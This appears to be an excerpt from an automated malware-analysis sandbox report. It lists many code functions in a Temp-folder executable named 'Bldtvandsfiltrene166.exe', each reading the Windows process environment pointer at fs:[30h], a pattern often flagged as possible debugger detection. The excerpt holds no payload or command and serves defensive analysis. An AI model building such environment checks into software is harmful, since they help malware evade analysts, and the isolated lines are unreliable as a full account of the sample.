Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov eax, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov ecx, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov eax, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E10E mov ecx, dword ptr fs:[00000030h]	11_2_2121E10E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21230115 mov eax, dword ptr fs:[00000030h]	11_2_21230115
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121A118 mov ecx, dword ptr fs:[00000030h]	11_2_2121A118
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121A118 mov eax, dword ptr fs:[00000030h]	11_2_2121A118
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121A118 mov eax, dword ptr fs:[00000030h]	11_2_2121A118
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121A118 mov eax, dword ptr fs:[00000030h]	11_2_2121A118
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A0124 mov eax, dword ptr fs:[00000030h]	11_2_211A0124
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116C156 mov eax, dword ptr fs:[00000030h]	11_2_2116C156
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244164 mov eax, dword ptr fs:[00000030h]	11_2_21244164
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244164 mov eax, dword ptr fs:[00000030h]	11_2_21244164
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176154 mov eax, dword ptr fs:[00000030h]	11_2_21176154
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176154 mov eax, dword ptr fs:[00000030h]	11_2_21176154
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21204144 mov eax, dword ptr fs:[00000030h]	11_2_21204144
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21204144 mov eax, dword ptr fs:[00000030h]	11_2_21204144
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21204144 mov ecx, dword ptr fs:[00000030h]	11_2_21204144
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21204144 mov eax, dword ptr fs:[00000030h]	11_2_21204144
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21204144 mov eax, dword ptr fs:[00000030h]	11_2_21204144
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21208158 mov eax, dword ptr fs:[00000030h]	11_2_21208158
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F019F mov eax, dword ptr fs:[00000030h]	11_2_211F019F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F019F mov eax, dword ptr fs:[00000030h]	11_2_211F019F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F019F mov eax, dword ptr fs:[00000030h]	11_2_211F019F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F019F mov eax, dword ptr fs:[00000030h]	11_2_211F019F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116A197 mov eax, dword ptr fs:[00000030h]	11_2_2116A197
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116A197 mov eax, dword ptr fs:[00000030h]	11_2_2116A197
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116A197 mov eax, dword ptr fs:[00000030h]	11_2_2116A197
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B0185 mov eax, dword ptr fs:[00000030h]	11_2_211B0185
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21214180 mov eax, dword ptr fs:[00000030h]	11_2_21214180
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21214180 mov eax, dword ptr fs:[00000030h]	11_2_21214180
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122C188 mov eax, dword ptr fs:[00000030h]	11_2_2122C188
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122C188 mov eax, dword ptr fs:[00000030h]	11_2_2122C188
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212461E5 mov eax, dword ptr fs:[00000030h]	11_2_212461E5
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE1D0 mov eax, dword ptr fs:[00000030h]	11_2_211EE1D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE1D0 mov eax, dword ptr fs:[00000030h]	11_2_211EE1D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE1D0 mov ecx, dword ptr fs:[00000030h]	11_2_211EE1D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE1D0 mov eax, dword ptr fs:[00000030h]	11_2_211EE1D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EE1D0 mov eax, dword ptr fs:[00000030h]	11_2_211EE1D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212361C3 mov eax, dword ptr fs:[00000030h]	11_2_212361C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212361C3 mov eax, dword ptr fs:[00000030h]	11_2_212361C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A01F8 mov eax, dword ptr fs:[00000030h]	11_2_211A01F8
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E016 mov eax, dword ptr fs:[00000030h]	11_2_2118E016
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E016 mov eax, dword ptr fs:[00000030h]	11_2_2118E016
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E016 mov eax, dword ptr fs:[00000030h]	11_2_2118E016
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E016 mov eax, dword ptr fs:[00000030h]	11_2_2118E016
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21206030 mov eax, dword ptr fs:[00000030h]	11_2_21206030
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F4000 mov ecx, dword ptr fs:[00000030h]	11_2_211F4000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000 mov eax, dword ptr fs:[00000030h]	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116A020 mov eax, dword ptr fs:[00000030h]	11_2_2116A020
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116C020 mov eax, dword ptr fs:[00000030h]	11_2_2116C020
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21172050 mov eax, dword ptr fs:[00000030h]	11_2_21172050
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F6050 mov eax, dword ptr fs:[00000030h]	11_2_211F6050
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119C073 mov eax, dword ptr fs:[00000030h]	11_2_2119C073
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212080A8 mov eax, dword ptr fs:[00000030h]	11_2_212080A8
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212360B8 mov eax, dword ptr fs:[00000030h]	11_2_212360B8
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212360B8 mov ecx, dword ptr fs:[00000030h]	11_2_212360B8
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117208A mov eax, dword ptr fs:[00000030h]	11_2_2117208A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211680A0 mov eax, dword ptr fs:[00000030h]	11_2_211680A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F20DE mov eax, dword ptr fs:[00000030h]	11_2_211F20DE
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116C0F0 mov eax, dword ptr fs:[00000030h]	11_2_2116C0F0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B20F0 mov ecx, dword ptr fs:[00000030h]	11_2_211B20F0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116A0E3 mov ecx, dword ptr fs:[00000030h]	11_2_2116A0E3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211780E9 mov eax, dword ptr fs:[00000030h]	11_2_211780E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F60E0 mov eax, dword ptr fs:[00000030h]	11_2_211F60E0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21248324 mov eax, dword ptr fs:[00000030h]	11_2_21248324
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21248324 mov ecx, dword ptr fs:[00000030h]	11_2_21248324
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21248324 mov eax, dword ptr fs:[00000030h]	11_2_21248324
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21248324 mov eax, dword ptr fs:[00000030h]	11_2_21248324
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116C310 mov ecx, dword ptr fs:[00000030h]	11_2_2116C310
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21190310 mov ecx, dword ptr fs:[00000030h]	11_2_21190310
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA30B mov eax, dword ptr fs:[00000030h]	11_2_211AA30B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA30B mov eax, dword ptr fs:[00000030h]	11_2_211AA30B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA30B mov eax, dword ptr fs:[00000030h]	11_2_211AA30B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F035C mov eax, dword ptr fs:[00000030h]	11_2_211F035C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F035C mov eax, dword ptr fs:[00000030h]	11_2_211F035C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F035C mov eax, dword ptr fs:[00000030h]	11_2_211F035C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F035C mov ecx, dword ptr fs:[00000030h]	11_2_211F035C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F035C mov eax, dword ptr fs:[00000030h]	11_2_211F035C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F035C mov eax, dword ptr fs:[00000030h]	11_2_211F035C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F2349 mov eax, dword ptr fs:[00000030h]	11_2_211F2349
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121437C mov eax, dword ptr fs:[00000030h]	11_2_2121437C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2124634F mov eax, dword ptr fs:[00000030h]	11_2_2124634F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123A352 mov eax, dword ptr fs:[00000030h]	11_2_2123A352
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21218350 mov ecx, dword ptr fs:[00000030h]	11_2_21218350
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21168397 mov eax, dword ptr fs:[00000030h]	11_2_21168397
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21168397 mov eax, dword ptr fs:[00000030h]	11_2_21168397
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21168397 mov eax, dword ptr fs:[00000030h]	11_2_21168397
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119438F mov eax, dword ptr fs:[00000030h]	11_2_2119438F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119438F mov eax, dword ptr fs:[00000030h]	11_2_2119438F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116E388 mov eax, dword ptr fs:[00000030h]	11_2_2116E388
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116E388 mov eax, dword ptr fs:[00000030h]	11_2_2116E388
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116E388 mov eax, dword ptr fs:[00000030h]	11_2_2116E388
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211783C0 mov eax, dword ptr fs:[00000030h]	11_2_211783C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211783C0 mov eax, dword ptr fs:[00000030h]	11_2_211783C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211783C0 mov eax, dword ptr fs:[00000030h]	11_2_211783C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211783C0 mov eax, dword ptr fs:[00000030h]	11_2_211783C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A3C0 mov eax, dword ptr fs:[00000030h]	11_2_2117A3C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A3C0 mov eax, dword ptr fs:[00000030h]	11_2_2117A3C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A3C0 mov eax, dword ptr fs:[00000030h]	11_2_2117A3C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A3C0 mov eax, dword ptr fs:[00000030h]	11_2_2117A3C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A3C0 mov eax, dword ptr fs:[00000030h]	11_2_2117A3C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A3C0 mov eax, dword ptr fs:[00000030h]	11_2_2117A3C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F63C0 mov eax, dword ptr fs:[00000030h]	11_2_211F63C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A63FF mov eax, dword ptr fs:[00000030h]	11_2_211A63FF
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E3F0 mov eax, dword ptr fs:[00000030h]	11_2_2118E3F0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E3F0 mov eax, dword ptr fs:[00000030h]	11_2_2118E3F0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E3F0 mov eax, dword ptr fs:[00000030h]	11_2_2118E3F0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122C3CD mov eax, dword ptr fs:[00000030h]	11_2_2122C3CD
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211803E9 mov eax, dword ptr fs:[00000030h]	11_2_211803E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212143D4 mov eax, dword ptr fs:[00000030h]	11_2_212143D4
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212143D4 mov eax, dword ptr fs:[00000030h]	11_2_212143D4
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E3DB mov eax, dword ptr fs:[00000030h]	11_2_2121E3DB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E3DB mov eax, dword ptr fs:[00000030h]	11_2_2121E3DB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E3DB mov ecx, dword ptr fs:[00000030h]	11_2_2121E3DB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121E3DB mov eax, dword ptr fs:[00000030h]	11_2_2121E3DB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116823B mov eax, dword ptr fs:[00000030h]	11_2_2116823B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116A250 mov eax, dword ptr fs:[00000030h]	11_2_2116A250
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176259 mov eax, dword ptr fs:[00000030h]	11_2_21176259
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274 mov eax, dword ptr fs:[00000030h]	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F8243 mov eax, dword ptr fs:[00000030h]	11_2_211F8243
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F8243 mov ecx, dword ptr fs:[00000030h]	11_2_211F8243
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122A250 mov eax, dword ptr fs:[00000030h]	11_2_2122A250
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122A250 mov eax, dword ptr fs:[00000030h]	11_2_2122A250
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21174260 mov eax, dword ptr fs:[00000030h]	11_2_21174260
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21174260 mov eax, dword ptr fs:[00000030h]	11_2_21174260
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21174260 mov eax, dword ptr fs:[00000030h]	11_2_21174260
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2124625D mov eax, dword ptr fs:[00000030h]	11_2_2124625D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116826B mov eax, dword ptr fs:[00000030h]	11_2_2116826B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212062A0 mov eax, dword ptr fs:[00000030h]	11_2_212062A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212062A0 mov ecx, dword ptr fs:[00000030h]	11_2_212062A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212062A0 mov eax, dword ptr fs:[00000030h]	11_2_212062A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212062A0 mov eax, dword ptr fs:[00000030h]	11_2_212062A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212062A0 mov eax, dword ptr fs:[00000030h]	11_2_212062A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212062A0 mov eax, dword ptr fs:[00000030h]	11_2_212062A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F0283 mov eax, dword ptr fs:[00000030h]	11_2_211F0283
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F0283 mov eax, dword ptr fs:[00000030h]	11_2_211F0283
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F0283 mov eax, dword ptr fs:[00000030h]	11_2_211F0283
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE284 mov eax, dword ptr fs:[00000030h]	11_2_211AE284
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE284 mov eax, dword ptr fs:[00000030h]	11_2_211AE284
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211802A0 mov eax, dword ptr fs:[00000030h]	11_2_211802A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211802A0 mov eax, dword ptr fs:[00000030h]	11_2_211802A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A2C3 mov eax, dword ptr fs:[00000030h]	11_2_2117A2C3
